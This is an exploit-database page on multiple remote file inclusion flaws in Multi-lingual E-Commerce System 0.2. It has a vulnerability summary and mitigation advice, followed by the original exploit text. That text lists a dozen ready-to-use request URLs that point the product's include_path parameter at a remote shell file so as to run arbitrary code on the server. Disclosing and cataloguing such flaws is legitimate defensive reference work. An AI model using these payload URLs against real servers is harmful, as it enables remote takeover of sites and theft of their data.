header-logo
Suggest Exploit
vendor:
Multi-lingual E-Commerce System
by:
Jose Luis Gongora Fernandez (a.k.a) JosS
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Multi-lingual E-Commerce System
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:mlecsphp:multi-lingual_e-commerce_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Multi-lingual E-Commerce System 0.2 Multiple Remote File Inclusion Vulnerabilities

Multiple Remote File Inclusion (RFI) vulnerabilities have been discovered in Multi-lingual E-Commerce System 0.2. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate RFI vulnerabilities is to restrict the files that can be included in a script. This can be done by using a whitelist of allowed files, or by using a blacklist of disallowed files. Additionally, input validation should be used to ensure that user-supplied data is not used to include files.
Source

Exploit-DB raw data:

Multi-lingual E-Commerce System 0.2 Multiple Remote File Inclusion Vulnerabilities
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- download: http://sourceforge.net/projects/mlecsphp/

- CMS:

 A multi-lingual multi-currency PHP e-commerce system.

~ [RFI]

http://target/path/inc/checkout2-CYM.php?include_path=[shell.txt?]
http://target/path/inc/checkout2-EN.php?include_path=[shell.txt?]
http://target/path/inc/checkout2-FR.php?include_path=[shell.txt?]
http://target/path/inc/cat-FR.php?include_path=[shell.txt?]
http://target/path/inc/cat-EN.php?include_path=[shell.txt?]
http://target/path/inc/cat-CYM.php?include_path=[shell.txt?]
http://target/path/inc/checkout1-CYM.php?include_path=[shell.txt?]
http://target/path/inc/checkout1-EN.php?include_path=[shell.txt?]
http://target/path/inc/checkout1-FR.php?include_path=[shell.txt?]
http://target/path/inc/prod-CYM.php?include_path=[shell.txt?]
http://target/path/inc/prod-EN.php?include_path=[shell.txt?]
http://target/path/inc/prod-FR.php?include_path=[shell.txt?]
[and more] [...]


__h0__